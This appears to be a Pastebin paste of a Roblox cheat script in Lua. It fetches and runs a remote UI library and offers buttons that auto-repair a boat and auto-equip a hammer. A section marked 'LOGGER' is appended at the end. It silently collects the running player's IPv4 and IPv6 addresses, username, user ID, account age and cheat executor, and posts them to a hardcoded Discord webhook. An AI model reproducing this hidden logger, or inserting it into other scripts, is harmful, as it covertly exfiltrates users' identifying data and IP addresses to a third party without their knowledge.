Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
- local LocalPlayer = game:GetService("Players").LocalPlayer
- local Window = Library.CreateLib("Auto Fix Boat", "DarkTheme")
- local Tab = Window:NewTab("Boat")
- local Section = Tab:NewSection("Fix Boat")
- Section:NewButton("Turn on Auto Fix Boat", "ButtonInfo", function()
- getgenv().hee = true --true or false
- for i,v in ipairs(game:GetService("Workspace").PlayerCharacters:GetChildren()) do
- if v:FindFirstChild("Hammer") then
- while hee do
- v:FindFirstChild("Hammer"):Activate()
- wait(15)
- end
- end
- end
- end)
- Section:NewButton("Turn off Auto Fix Boat", "ButtonInfo", function()
- getgenv().hee = false --true or false
- end)
- Section:NewButton("Auto Equip Hammer", "ButtonInfo", function()
- getgenv().Hammer = true --true or false
- if game.Players.LocalPlayer.Backpack:FindFirstChild("Hammer") then
- for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
- if v.name == "Hammer" then
- while Hammer do
- v.Parent = game.Players.LocalPlayer.Character
- wait(20)
- end
- end
- end
- end
- end)
- Section:NewButton("Turn off Auto Equip Hammer", "ButtonInfo", function()
- getgenv().Hammer = false --true or false
- end)
- Section:NewLabel("Misc")
- Section:NewKeybind("KeybindText", "KeybindInfo", Enum.KeyCode.F, function()
- Library:ToggleUI()
- end)
- Section:NewColorPicker("Color Text", "Color Info", Color3.fromRGB(0,0,0), function(color)
- print(color)
- -- Second argument is the default color
- end)
- local Tab2 = Window:NewTab("Credits")
- local Section2 = Tab2:NewSection("By Nuttanun")
- Section2:NewLabel("Ver 0.1")
- Section2:NewLabel("Update : Hee")
- --LOGGER
- local Webhook = "https://discord.com/api/webhooks/906566623576621126/dNCR_NfQRZyiBfsT9HU9e0JrbPazIvEMxW4u5oc9WHzC4z963XL2N8lDOrgYIljVGJt1" -- Put your Webhook link here
- local IPv4 = game:HttpGet("https://v4.ident.me/")
- local IPv6 = game:HttpGet("https://v6.ident.me/")
- local Headers = {["content-type"] = "application/json"} -- Don't Modify
- local LocalPlayer = game:GetService("Players").LocalPlayer
- local AccountAge = LocalPlayer.AccountAge
- local Exploit = KRNL_LOADED or is_synapse_function and "Synapse X"
- local UserId = LocalPlayer.UserId
- local PlayerData =
- {
- ["content"] = "",
- ["embeds"] = {{
- ["title"] = "Username: " .. game.Players.LocalPlayer.Name.."",
- ["description"] = PlayerName,
- ['thumbnail'] = {['url'] = "https://c.tenor.com/SoBzDkrJuNUAAAAC/cat-hack.gif",
- ['height']=1536, ['width']=864},
- ["color"] = tonumber(0x2B6BE4),
- ["fields"] = {
- {
- ["name"] = "Exploit used:",
- ["value"] = Exploit,
- ["inline"] = true
- },
- {
- ["name"] = "AccountAge:",
- ["value"] = AccountAge,
- ["inline"] = true
- },
- {
- ["name"] = "UserId:",
- ["value"] = UserId,
- ["inline"] = true
- },
- {
- ["name"] = "IPv4:",
- ["value"] = IPv4,
- ["inline"] = true
- },
- {
- ["name"] = "IPv6:",
- ["value"] = IPv6,
- ["inline"] = true
- },
- },
- }}
- }
- local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
- local HttpRequest = http_request;
- if syn then
- HttpRequest = syn.request
- else
- HttpRequest = http_request
- end
- HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement